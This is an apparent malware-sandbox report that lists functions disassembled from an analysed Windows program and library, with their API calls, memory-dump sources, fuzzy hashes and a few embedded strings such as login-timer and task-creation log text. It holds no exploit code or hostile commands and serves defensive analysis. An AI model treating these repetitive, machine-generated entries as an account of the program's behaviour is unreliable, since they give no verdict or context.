                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile_wcsncpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4108816585-0
                                                                                                                                                                      • Opcode ID: 16042d9b98ec4e89cd8baf89a9f4aa68132347b2a3d4bf743adb231d447bb730
                                                                                                                                                                      • Instruction ID: 3b1003b3983e5d2576fc14625530bd2c901635bd91130ebdb7aea772b1cf0243
                                                                                                                                                                      • Opcode Fuzzy Hash: 16042d9b98ec4e89cd8baf89a9f4aa68132347b2a3d4bf743adb231d447bb730
                                                                                                                                                                      • Instruction Fuzzy Hash: AE01F771650714BADB305B669C49FAF7AACEBD0B94F118427FA45EB381E770994082A0
                                                                                                                                                                      Function 5F516C30 Relevance: 4.6, APIs: 3, Instructions: 56registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 5F516C75
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,000001FE,?,?,00000001), ref: 5F516C96
                                                                                                                                                                      • _wcscpy.LIBCMT ref: 5F516CA8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue_memset_wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4123947661-0
                                                                                                                                                                      • Opcode ID: 08fc9298282b561745967f803a8e77af330864988c200b61314959cf8916e11d
                                                                                                                                                                      • Instruction ID: 09548b75503b3f64980108416fcc21cfdcbbd88f9b8863afa88b6e38139f16e8
                                                                                                                                                                      • Opcode Fuzzy Hash: 08fc9298282b561745967f803a8e77af330864988c200b61314959cf8916e11d
                                                                                                                                                                      • Instruction Fuzzy Hash: 431188B66023186FD710DBA4DD84FDBB3FCDB44754F108176A615D7182DA70BA488BA0
                                                                                                                                                                      Function 0017CE6B Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 0017CE75
                                                                                                                                                                        • Part of subcall function 0017CBDE: _wcslen.LIBCMT ref: 0017CBEF
                                                                                                                                                                      • _memset.LIBCMT ref: 0017CEE2
                                                                                                                                                                      • GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 0017CEF9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3_LongNamePath_memset_wcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3807393607-0
                                                                                                                                                                      • Opcode ID: 632cdfd472fe8841574eedcfcc71fad0d1bb8cfe681b7f7b62dd308af8c37ed3
                                                                                                                                                                      • Instruction ID: aa7c85a534dc5de43b36c446a7e3e2bba5047fa864ad9ba5a18129f925c454bb
                                                                                                                                                                      • Opcode Fuzzy Hash: 632cdfd472fe8841574eedcfcc71fad0d1bb8cfe681b7f7b62dd308af8c37ed3
                                                                                                                                                                      • Instruction Fuzzy Hash: 3B01B571AA065CABDF14FB54CC4ABEE72B9AF64701F004089F008A7182DBB45F958FD5
                                                                                                                                                                      Function 001B2FDE Relevance: 4.5, APIs: 3, Instructions: 43COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 001B2FE5
                                                                                                                                                                        • Part of subcall function 0019D649: BeginPaint.USER32(?,?), ref: 0019D65B
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 001B3038
                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 001B3045
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Paint$BeginH_prolog3_Window
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4095823405-0
                                                                                                                                                                      • Opcode ID: 9fd58f00d48c3df49c01c701bc81a135f28b8247642d3df8c8676e8f2ad6d17e
                                                                                                                                                                      • Instruction ID: 2bd287ad84c1a92f54c12f23f09feceaed2c60b99ad745a9457db508f6c5be39
                                                                                                                                                                      • Opcode Fuzzy Hash: 9fd58f00d48c3df49c01c701bc81a135f28b8247642d3df8c8676e8f2ad6d17e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9C0116B1900A48AFDF119FD1CC85DEEBBBAFF18308B404429B606AA160D771AD59CF10
                                                                                                                                                                      Function 00162770 Relevance: 4.5, APIs: 3, Instructions: 42fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00162744,?), ref: 00162784
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001627CD
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001627D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle$CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1378612225-0
                                                                                                                                                                      • Opcode ID: d672bf6417c52e98afd09e306521903a5bf45841e5904039747e64a401a34a74
                                                                                                                                                                      • Instruction ID: c830ec4533954b567022ee637a5b3c866dcd2533362aa0865e6484530df191fc
                                                                                                                                                                      • Opcode Fuzzy Hash: d672bf6417c52e98afd09e306521903a5bf45841e5904039747e64a401a34a74
                                                                                                                                                                      • Instruction Fuzzy Hash: D1F0E232B9472077EA302778BC4AFDA26858FF4B20F264524FE15AB2C4EBB058614295
                                                                                                                                                                      Function 001D0319 Relevance: 4.5, APIs: 3, Instructions: 36fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteFileW.KERNEL32(001D059E,?,0024CDA4,?,001D059E,?), ref: 001D0323
                                                                                                                                                                      • CreateFileW.KERNEL32(001D059E,C0000000,00000001,00000000,00000001,00000080,00000000,?,001D059E,?), ref: 001D033E
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001D0367
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateDeleteHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3273607511-0
                                                                                                                                                                      • Opcode ID: 36ab0094f5c139c407fbe8049baa57c3aa3fbef01c0bf5e174f4b217a11052f3
                                                                                                                                                                      • Instruction ID: 07c5bb6463eb1882b0d9c35adc07d250897a2d03d3e695ec35e1bc2f07b1aa86
                                                                                                                                                                      • Opcode Fuzzy Hash: 36ab0094f5c139c407fbe8049baa57c3aa3fbef01c0bf5e174f4b217a11052f3
                                                                                                                                                                      • Instruction Fuzzy Hash: 65F0E9321002047FDB211B61DC09FEA3A69EB58771F018425FA15961D0DB7290509794
                                                                                                                                                                      Function 001E5546 Relevance: 4.5, APIs: 3, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 001E5560
                                                                                                                                                                        • Part of subcall function 001E5674: __FF_MSGBANNER.LIBCMT ref: 001E5697
                                                                                                                                                                        • Part of subcall function 001E5674: __NMSG_WRITE.LIBCMT ref: 001E569E
                                                                                                                                                                        • Part of subcall function 001E5674: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,001F05A7,?,00000001,?,?,001F3329,00000018,0023EF60,0000000C,001F33BA), ref: 001E56EB
                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 001E5583
                                                                                                                                                                        • Part of subcall function 001E552B: std::exception::exception.LIBCMT ref: 001E5537
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 001E55A5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3715980512-0
                                                                                                                                                                      • Opcode ID: fa26167e9b64b000af305e29e6f66f65fce4c56858e11ab551b0d90ca43a3e70
                                                                                                                                                                      • Instruction ID: 86715dbb5c5acda91c57f3c3ecea0efe50be89b7e8e2564d0c96934a4c6ebc88
                                                                                                                                                                      • Opcode Fuzzy Hash: fa26167e9b64b000af305e29e6f66f65fce4c56858e11ab551b0d90ca43a3e70
                                                                                                                                                                      • Instruction Fuzzy Hash: 71F02735900EC862CB087766FC07AAD3BAB8F2631CF040024F811990A2EF60DF418A95
                                                                                                                                                                      Function 5F528425 Relevance: 4.5, APIs: 3, Instructions: 34COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 5F52843F
                                                                                                                                                                        • Part of subcall function 5F52856A: __FF_MSGBANNER.LIBCMT ref: 5F52858D
                                                                                                                                                                        • Part of subcall function 5F52856A: __NMSG_WRITE.LIBCMT ref: 5F528594
                                                                                                                                                                        • Part of subcall function 5F52856A: RtlAllocateHeap.NTDLL(00000000,-0000000D,00000001,00000000,00000000,?,5F532E8E,00000002,00000001,00000002,?,5F52F8B1,00000018,5F56C4F0,0000000C,5F52F942), ref: 5F5285E1
                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 5F528462
                                                                                                                                                                        • Part of subcall function 5F52840A: std::exception::exception.LIBCMT ref: 5F528416
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 5F528484
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3715980512-0
                                                                                                                                                                      • Opcode ID: 981617b25d6fbb6860bbfb31b718d8f9d6afc31ec51282b6b47b14676518ac2b
                                                                                                                                                                      • Instruction ID: c3e0bfc0d44f507f91c1216826b7239e81d3a5d28c8287f0dfcf5f252c0ff690
                                                                                                                                                                      • Opcode Fuzzy Hash: 981617b25d6fbb6860bbfb31b718d8f9d6afc31ec51282b6b47b14676518ac2b
                                                                                                                                                                      • Instruction Fuzzy Hash: B4F0E2E1403A0867CA08A7F0E81899B3BE8DF8066DB00863BE813954D1DF20A7518AC1
                                                                                                                                                                      Function 001B1513 Relevance: 4.5, APIs: 3, Instructions: 29windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindow.USER32(?), ref: 001B152B
                                                                                                                                                                      • PostMessageW.USER32(?,000008C7,?,?), ref: 001B154E
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 001B155A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InvalidateMessagePostRectWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2061673745-0
                                                                                                                                                                      • Opcode ID: 6a03f1d30ffff61e300dc62ae72b0bd4283034fb447070040c35ac15e5a28d59
                                                                                                                                                                      • Instruction ID: 5a2e70dae7a047f56b8115a33da82ca16a490437fcf66384f4c094f6ae2bd51b
                                                                                                                                                                      • Opcode Fuzzy Hash: 6a03f1d30ffff61e300dc62ae72b0bd4283034fb447070040c35ac15e5a28d59
                                                                                                                                                                      • Instruction Fuzzy Hash: 44F0FE71500A10AAEB315B69EC09EA7FBF9FFD4700F41451EF596C1460DBA1A411DB64
                                                                                                                                                                      Function 00181E26 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$_wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3469035223-0
                                                                                                                                                                      • Opcode ID: 688fe22aace665f526812ecd71053a3813945175e789a1431b953bff6509cf06
                                                                                                                                                                      • Instruction ID: 2261976bd597a939bc016ef4f1240dee4e769653ca168faa4fab5c1cae92cbac
                                                                                                                                                                      • Opcode Fuzzy Hash: 688fe22aace665f526812ecd71053a3813945175e789a1431b953bff6509cf06
                                                                                                                                                                      • Instruction Fuzzy Hash: 6FE01233204550ABD2292556AC02B6E93E9DBB1B33F21481FF545D3181DB6458415659
                                                                                                                                                                      Function 5F4FEC26 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                      • String ID: DNS--CName:
                                                                                                                                                                      • API String ID: 2102423945-2042605141
                                                                                                                                                                      • Opcode ID: 9d4c28d01ae888b6fec5019bec95c087a3954f759a89e7cf424022b1b18d1eae
                                                                                                                                                                      • Instruction ID: 6a7fb072109c7032da0be070e3fcca85847df27a456c31f01538faf84e4cac15
                                                                                                                                                                      • Opcode Fuzzy Hash: 9d4c28d01ae888b6fec5019bec95c087a3954f759a89e7cf424022b1b18d1eae
                                                                                                                                                                      • Instruction Fuzzy Hash: 8461AFB14027059FDB25DFA0DC40DDEBBB6BF14202F088A2EE55B93661DB71B956CB80
                                                                                                                                                                      Function 5F50151C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F501523
                                                                                                                                                                        • Part of subcall function 5F4FC7D8: __EH_prolog3.LIBCMT ref: 5F4FC7DF
                                                                                                                                                                        • Part of subcall function 5F4FC7D8: GetTickCount.KERNEL32 ref: 5F4FC85B
                                                                                                                                                                        • Part of subcall function 5F4FC7D8: _memset.LIBCMT ref: 5F4FC964
                                                                                                                                                                        • Part of subcall function 5F51405E: _memset.LIBCMT ref: 5F514091
                                                                                                                                                                        • Part of subcall function 5F51405E: wvnsprintfW.SHLWAPI(?,000003FF,5F5BC288,5F4FE1F9), ref: 5F5140AC
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.] __CreateTask Init task fail. Id:%d, Pdown:%s, File:%s, xrefs: 5F501577, 5F50160D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3_memset$CountTickwvnsprintf
                                                                                                                                                                      • String ID: [%d.] __CreateTask Init task fail. Id:%d, Pdown:%s, File:%s
                                                                                                                                                                      • API String ID: 4122227224-1580467494
                                                                                                                                                                      • Opcode ID: 0d9680eeef66dbad2521bfdcfea1218b7ed720833435669a99e72c0f2c507d86
                                                                                                                                                                      • Instruction ID: 80e90aa2b38fac38d39dc642619dd4fecac24df7f1be9fce4a72725981927845
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d9680eeef66dbad2521bfdcfea1218b7ed720833435669a99e72c0f2c507d86
                                                                                                                                                                      • Instruction Fuzzy Hash: E221D1F0301345BBCF016FF48C90DBE76ABAF84214F08453EF51A9A3A0DB7599119B92
                                                                                                                                                                      Function 5F522C7A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick
                                                                                                                                                                      • String ID: Login begin Timer
                                                                                                                                                                      • API String ID: 536389180-3628901022
                                                                                                                                                                      • Opcode ID: 65a25820a5f8732270d5c81df5e2301bb919a711f51e02ebaa3b61523c8febe0
                                                                                                                                                                      • Instruction ID: 8f1ce891d134423a05be78055d73d50e12a50084dfc847d161d2abb6b5045c5d
                                                                                                                                                                      • Opcode Fuzzy Hash: 65a25820a5f8732270d5c81df5e2301bb919a711f51e02ebaa3b61523c8febe0
                                                                                                                                                                      • Instruction Fuzzy Hash: 2231D1F5907B805EF729DFB4D4987AABBE19B41210F900B3ED08A872C2DA717845CB61
                                                                                                                                                                      Function 5F525ECE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,5F525999,5F5BC810,00000000,?), ref: 5F525F2C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
